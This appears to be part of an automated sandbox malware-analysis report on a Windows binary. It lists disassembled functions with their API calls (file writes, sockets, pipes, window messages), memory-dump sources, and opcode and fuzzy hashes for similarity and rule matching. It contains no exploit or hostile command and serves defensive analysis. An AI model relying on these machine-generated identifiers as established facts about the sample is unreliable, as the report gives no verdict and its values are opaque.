                                                                                                                                                                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00295F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 002957E3
                                                                                                                                                                        • __fassign.LIBCMT ref: 0029585E
                                                                                                                                                                        • __fassign.LIBCMT ref: 00295879
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0029589F
                                                                                                                                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,00295F16,00000000,?,?,?,?,?,?,?,?,?,00295F16,?), ref: 002958BE
                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,00295F16,00000000,?,?,?,?,?,?,?,?,?,00295F16,?), ref: 002958F7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                                                        • Opcode ID: 648afab0da4a58aa4773168c18fe938704feda446694af143e2b100ef078a4c6
                                                                                                                                                                        • Instruction ID: c3245bfae87fe16957217900d79bfd2a90ff76049be13de0fccf4262068d18c8
                                                                                                                                                                        • Opcode Fuzzy Hash: 648afab0da4a58aa4773168c18fe938704feda446694af143e2b100ef078a4c6
                                                                                                                                                                        • Instruction Fuzzy Hash: B151BF70A14659DFEF11CFA8D885BEEBBF8EF08320F14411AE955E7291D730A951CBA0
                                                                                                                                                                        Function 00283090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 002830BB
                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 002830C3
                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00283151
                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0028317C
                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 002831D1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                        • String ID: csm
                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                        • Opcode ID: 1a010392715eaf9caecc857d5f2200d81311312d924a5a8d612b7c9c5eb8a80b
                                                                                                                                                                        • Instruction ID: 1348096fea743bb3fcc4ce80c275b5979b89d2534f67a84e36a7d08a7541d002
                                                                                                                                                                        • Opcode Fuzzy Hash: 1a010392715eaf9caecc857d5f2200d81311312d924a5a8d612b7c9c5eb8a80b
                                                                                                                                                                        • Instruction Fuzzy Hash: 7241D638A212099BCF10EF58C885A9EBBB5AF44F24F148155E8186B3D2D771DB21CF91
                                                                                                                                                                        Function 002E1B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002E3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 002E3AD7
                                                                                                                                                                          • Part of subcall function 002E3AAB: _wcslen.LIBCMT ref: 002E3AF8
                                                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002E1B6F
                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 002E1B7E
                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 002E1C26
                                                                                                                                                                        • closesocket.WSOCK32(00000000), ref: 002E1C56
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2675159561-0
                                                                                                                                                                        • Opcode ID: a618315d07bd1435e50f3e848203452cb0e355af19882b384f4142090666ffc2
                                                                                                                                                                        • Instruction ID: 6518d8f3c60af37437e2db7559c4bf360ebaa9046447aa2fd240f89696b0a0a4
                                                                                                                                                                        • Opcode Fuzzy Hash: a618315d07bd1435e50f3e848203452cb0e355af19882b384f4142090666ffc2
                                                                                                                                                                        • Instruction Fuzzy Hash: 87412531650105AFDB109F25C848BB9B7EAEF40368F548069F8059F292D770EDA1CFE1
                                                                                                                                                                        Function 002CD7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002CE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002CD7CD,?), ref: 002CE714
                                                                                                                                                                          • Part of subcall function 002CE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002CD7CD,?), ref: 002CE72D
                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 002CD7F0
                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 002CD82A
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002CD8B0
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002CD8C6
                                                                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 002CD90C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                        • API String ID: 3164238972-1173974218
                                                                                                                                                                        • Opcode ID: 80a0b6c4d0e606087d13562b8055a00098bff0a6ac2245244b97367949008fdf
                                                                                                                                                                        • Instruction ID: 8e11ab759ab1b2d49ad3b95e2ae3ce8519ad10820516018d54bef23ade4acce6
                                                                                                                                                                        • Opcode Fuzzy Hash: 80a0b6c4d0e606087d13562b8055a00098bff0a6ac2245244b97367949008fdf
                                                                                                                                                                        • Instruction Fuzzy Hash: 8D4182718152199EDF12EFA4D985FDE73B8AF08340F1001FAA509EB141EB34A799CF50
                                                                                                                                                                        Function 002D42B9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetInputState.USER32 ref: 002D4310
                                                                                                                                                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 002D4367
                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 002D4390
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 002D439A
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002D43AB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                        • String ID: (3
                                                                                                                                                                        • API String ID: 2256411358-113007392
                                                                                                                                                                        • Opcode ID: c0d8502176fc1887fb373ca7e171f5e7c4cfdf04507053d150d9f3b7a16a3bb9
                                                                                                                                                                        • Instruction ID: fd2f65bdfb3a5265a3a4807c298529e7d642fad122116e98a6eb53388e9b9464
                                                                                                                                                                        • Opcode Fuzzy Hash: c0d8502176fc1887fb373ca7e171f5e7c4cfdf04507053d150d9f3b7a16a3bb9
                                                                                                                                                                        • Instruction Fuzzy Hash: 5B318870524246DFEB65EF78D889B7737ACAB01314F2445ABD452C22A0D7B4ACA5CB11
                                                                                                                                                                        Function 002F3899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 002F38B8
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 002F38EB
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 002F3920
                                                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 002F3952
                                                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 002F397C
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 002F398D
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002F39A7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2178440468-0
                                                                                                                                                                        • Opcode ID: a30ea881dc9a6e5fc4a5d2ee4e418321250bf074e4d67f482720e3783b25f9a3
                                                                                                                                                                        • Instruction ID: 8f0fadcab20857a7d552e3221fe1429a16b9c32ba5d3e2bf17071a235828ee26
                                                                                                                                                                        • Opcode Fuzzy Hash: a30ea881dc9a6e5fc4a5d2ee4e418321250bf074e4d67f482720e3783b25f9a3
                                                                                                                                                                        • Instruction Fuzzy Hash: 4631143161425AEFDB21CF59EC88F65B7A5EB867A0F141174F610CB2B1CBB0A964DB01
                                                                                                                                                                        Function 002C808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002C80D0
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002C80F6
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 002C80F9
                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 002C8117
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 002C8120
                                                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 002C8145
                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 002C8153
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                                                        • Opcode ID: 0fa89d99fae3f8dc90d3c0e67f317e6c011bcb964425a33a34475aaba5a6de6f
                                                                                                                                                                        • Instruction ID: 5a9c2e0f6c929d5772cbf833c034fb2261e3dc1d0d9455fdcdfb454e86850562
                                                                                                                                                                        • Opcode Fuzzy Hash: 0fa89d99fae3f8dc90d3c0e67f317e6c011bcb964425a33a34475aaba5a6de6f
                                                                                                                                                                        • Instruction Fuzzy Hash: 57219A76610119BF9F10DFA8DC88DBB73EDEB093607048525F909DB290DAB0DD46CB60
                                                                                                                                                                        Function 002C8164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002C81A9
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002C81CF
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 002C81D2
                                                                                                                                                                        • SysAllocString.OLEAUT32 ref: 002C81F3
                                                                                                                                                                        • SysFreeString.OLEAUT32 ref: 002C81FC
                                                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 002C8216
                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 002C8224
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                                                        • Opcode ID: fdb97e9d4036acacad14186b43ac98de0195aef5c4a22c3be148d96238a2dd34
                                                                                                                                                                        • Instruction ID: 7775f2d9dc78f359193aeafea75aa50098c9b87eac609340115d1788788aaa38
                                                                                                                                                                        • Opcode Fuzzy Hash: fdb97e9d4036acacad14186b43ac98de0195aef5c4a22c3be148d96238a2dd34
                                                                                                                                                                        • Instruction Fuzzy Hash: 48217775610105BF9B109FA8EC8DDBA77ECEB09370705C125F905CB1A0DA70EC51CB65
                                                                                                                                                                        Function 002D0E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 002D0E99
                                                                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002D0ED5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                                                                        • String ID: nul
                                                                                                                                                                        • API String ID: 1424370930-2873401336
                                                                                                                                                                        • Opcode ID: e0035869141c1279586c396170dc2af364c173f2661bb7229698b6cb6eb56510
                                                                                                                                                                        • Instruction ID: 570bd6c6ebf46929ee02765dbbee7d3b07aca70405fec5f6f78f9aacbd936a4a
                                                                                                                                                                        • Opcode Fuzzy Hash: e0035869141c1279586c396170dc2af364c173f2661bb7229698b6cb6eb56510
                                                                                                                                                                        • Instruction Fuzzy Hash: B6214D7451030AAFDB208F25D885B9A77A9BF54760F204A6AFCA5D72E0DB70DC60DB50
                                                                                                                                                                        Function 002D0F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 002D0F6D
                                                                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002D0FA8
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                                                                        • String ID: nul
                                                                                                                                                                        • API String ID: 1424370930-2873401336
                                                                                                                                                                        • Opcode ID: 4f532ae0ddb88c73f013d7d334b3fa7a8a33b103dd7c6f9b5bad828173c4411b
                                                                                                                                                                        • Instruction ID: d51bfdaf2d9de6558324c673868315b969a74e723749bea3060e947a0d17fa55
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f532ae0ddb88c73f013d7d334b3fa7a8a33b103dd7c6f9b5bad828173c4411b
                                                                                                                                                                        • Instruction Fuzzy Hash: E3216075510346AFDB209F689C44B9A77A9BF55771F300A1AECA1D33E0DB709CA0DB50
                                                                                                                                                                        Function 002F4B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00267873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002678B1
                                                                                                                                                                          • Part of subcall function 00267873: GetStockObject.GDI32(00000011), ref: 002678C5
                                                                                                                                                                          • Part of subcall function 00267873: SendMessageW.USER32(00000000,00000030,00000000), ref: 002678CF
                                                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002F4BB0
                                                                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002F4BBD
                                                                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002F4BC8
                                                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002F4BD7
                                                                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002F4BE3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                                                                        • Opcode ID: 90af66ce320128140e1a07fdabbbbb6c9fe5833716065f0a139a41bd85a59b69
                                                                                                                                                                        • Instruction ID: 14daf4fbbee1e077561be462bea420b20cc4f5af08b9675a469dfad81fc1056e
                                                                                                                                                                        • Opcode Fuzzy Hash: 90af66ce320128140e1a07fdabbbbb6c9fe5833716065f0a139a41bd85a59b69
                                                                                                                                                                        • Instruction Fuzzy Hash: 4D1184B155011DBEEB115FA4DC85EEBBF5DEF087A8F014110F604A6050C671DC219BA0
                                                                                                                                                                        Function 0029DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0029DB23: _free.LIBCMT ref: 0029DB4C
                                                                                                                                                                        • _free.LIBCMT ref: 0029DBAD
                                                                                                                                                                          • Part of subcall function 00292D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0029DB51,00331DC4,00000000,00331DC4,00000000,?,0029DB78,00331DC4,00000007,00331DC4,?,0029DF75,00331DC4), ref: 00292D4E
                                                                                                                                                                          • Part of subcall function 00292D38: GetLastError.KERNEL32(00331DC4,?,0029DB51,00331DC4,00000000,00331DC4,00000000,?,0029DB78,00331DC4,00000007,00331DC4,?,0029DF75,00331DC4,00331DC4), ref: 00292D60
                                                                                                                                                                        • _free.LIBCMT ref: 0029DBB8
                                                                                                                                                                        • _free.LIBCMT ref: 0029DBC3
                                                                                                                                                                        • _free.LIBCMT ref: 0029DC17
                                                                                                                                                                        • _free.LIBCMT ref: 0029DC22
                                                                                                                                                                        • _free.LIBCMT ref: 0029DC2D
                                                                                                                                                                        • _free.LIBCMT ref: 0029DC38
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                        • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                        • Instruction ID: 6492b0a50e696b2fddeceb8660e5470c48026096ac21c0894140a23c04c9faff
                                                                                                                                                                        • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                        • Instruction Fuzzy Hash: 06115172561B04FADD20BBB0CD07FCB77DC9F24714F410C19B399AA152DA75B6249E90
                                                                                                                                                                        Function 002C6078 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
